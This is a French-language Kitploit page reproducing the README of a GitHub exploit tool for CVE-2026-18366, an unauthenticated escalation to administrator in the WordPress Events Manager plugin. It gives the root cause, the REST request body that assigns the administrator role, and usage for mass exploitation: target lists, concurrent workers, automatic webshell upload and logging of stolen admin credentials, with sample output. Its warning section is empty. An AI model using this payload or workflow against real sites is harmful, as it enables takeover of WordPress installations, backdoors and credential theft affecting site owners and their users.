Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-18366 — Events Manager < 7.4.1 - Élévation de privilèges non authentifiée vers Administrateur | Kitploit
Outils/GitHubGitHub/nxploited/cve-2026-18366
Escalade de PrivilègesScanners de Vulnérabilités WebExploitationExploitation d'Applications WebCollecte d'InformationsPost-Exploitation
GitHubnxploited/cve-2026-18366

CVE-2026-18366

Events Manager < 7.4.1 - Élévation de privilèges non authentifiée vers Administrateur

Voir le dépôt
225il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-18366

Events Manager < 7.4.1 - Élévation de privilèges non authentifiée vers Administrateur

CVE CVSS WordPress

Typing SVG


🔗 Restez informé

Telegram

Pour les dernières zero-days, exploits et recherches en sécurité

Telegram Channel


📋 Aperçu de la vulnérabilité

AttributDétails
CVE IDCVE-2026-18366
Gravité🔴 CRITIQUE (CVSS 9.8)
PluginEvents Manager pour WordPress
Versions affectées< 7.4.1
Type de vulnérabilitéÉlévation de privilèges non authentifiée
Vecteur d'attaqueRéseau
Authentification requiseAucune

🔍 Description technique

Analyse de la cause racine

La vulnérabilité se trouve dans EM\Archetypes::map_meta_cap dans classes/em-archetypes.php. Le plugin ne restreint pas correctement son mappage de capacités :

  1. Traitant TOUT ID d'objet comme un ID de post
  2. Si la publication est un CPT event ou location, il efface $caps = []
  3. Ne reconstitue jamais les capacités pour edit_user, delete_user ou promote_user
  4. Capacités vides → has_cap() renvoie true, y compris pour l'utilisateur 0 (invité)

Vecteur d'attaque

POST|PUT|PATCH  /wp-json/wp/v2/users/{id}
POST            /index.php?rest_route=/wp/v2/users/{id}

Body: {"password":"...","roles":["administrator"]}

Condition : {id} doit être égal à wp_posts.ID d'un CPT event ou location.

⚠️ L'API REST non authentifiée ne requiert pas de nonce (aucun cookie de session).

Exploitation des réservations invitées

Les réservations invitées (dbem_bookings_anonymous=1 par défaut) créent de vrais utilisateurs WP, permettant de forcer une collision. Le nonce de réservation est publiquement disponible sur les formulaires d'événements.


🚀 Utilisation

Prérequis

pip install aiohttp

Démarrage rapide

python CVE-2026-18366.py

Le script demandera :

  • list → Chemin vers le fichier de liste de cibles (défaut : list.txt)
  • speed → Nombre de workers concurrents (défaut : 10)

Options de ligne de commande

python CVE-2026-18366.py -l targets.txt -s 20 --timeout 30
OptionDescription
-l, --listChemin vers le fichier contenant les URL cibles
-s, --speedNombre de workers concurrents (1-200)
--timeoutDélai d'expiration des requêtes en secondes (défaut : 20)

Format de la liste de cibles

Créez un fichier list.txt avec une cible par ligne :

https://target1.com
https://target2.com/wordpress
http://target3.com
target4.com

📊 Sortie

Sortie console

[+] [HH:MM:SS] target.com  ADMIN  username:password  uid=X  path
[+] [HH:MM:SS] target.com  SHELL  https://target.com/wp-content/plugins/...

Fichier de résultats

Les compromissions réussies sont enregistrées dans adminS.txt :

https://target.com | username:Nx_admin_@!KSA | uid=X | path=id-collision | ADMIN | shell_url

🔄 Flux d'exploitation

┌─────────────────────────────────────────────────────────────────┐
│                    CVE-2026-18366 Flow                          │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  ┌──────────┐    ┌─────────────┐    ┌──────────────────────┐   │
│  │  Detect  │ →  │ Collect IDs │ →  │  PATH A: ID Brute    │   │
│  │  Plugin  │    │  (CPT/HTML) │    │  REST /users/{id}    │   │
│  └──────────┘    └─────────────┘    └──────────┬───────────┘   │
│                                                 │               │
│                                          ┌──────▼──────┐        │
│                                          │   Success?  │        │
│                                          └──────┬──────┘        │
│                                       No │      │ Yes           │
│                               ┌──────────▼──────▼──────────┐    │
│                               │                            │    │
│  ┌──────────────────────┐     │    ┌─────────────────┐     │    │
│  │  PATH B: Guest Book  │ ←───┘    │  Login + Verify │     │    │
│  │  Create user until   │          │  Admin Access   │     │    │
│  │  user_id == post_id  │          └────────┬────────┘     │    │
│  └──────────────────────┘                   │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │  Upload Shell   │     │    │
│                                    │  (Plugin/Theme) │     │    │
│                                    └────────┬────────┘     │    │
│                                             │              │    │
│                                    ┌────────▼────────┐     │    │
│                                    │   Save Results  │     │    │
│                                    │   adminS.txt    │     │    │
│                                    └─────────────────┘     │    │
│                                                            │    │
└────────────────────────────────────────────────────────────────┘

⚙️ Fonctionnalités

  • Architecture asynchrone → Analyse concurrente haute performance
  • Double voie d'attaque → Collision d'ID + exploitation des réservations invitées
  • Téléversement automatique de shell → Déploiement d'un webshell dans le plugin/thème
  • Détection de version → Identification automatique des versions vulnérables
  • Énumération intelligente des noms d'utilisateur → Multiples techniques d'énumération
  • Vérification de connexion → Validation par cookie + XML-RPC
  • Élévation de privilèges → Promotion automatique en administrateur

📁 Structure des fichiers

├── CVE-2026-18366.py    # Main exploit script
├── list.txt             # Target URLs (create this)
├── adminS.txt           # Successful results (auto-created)
└── README.md            # This documentation

⚠️ Avertissement

Télécharger l’outil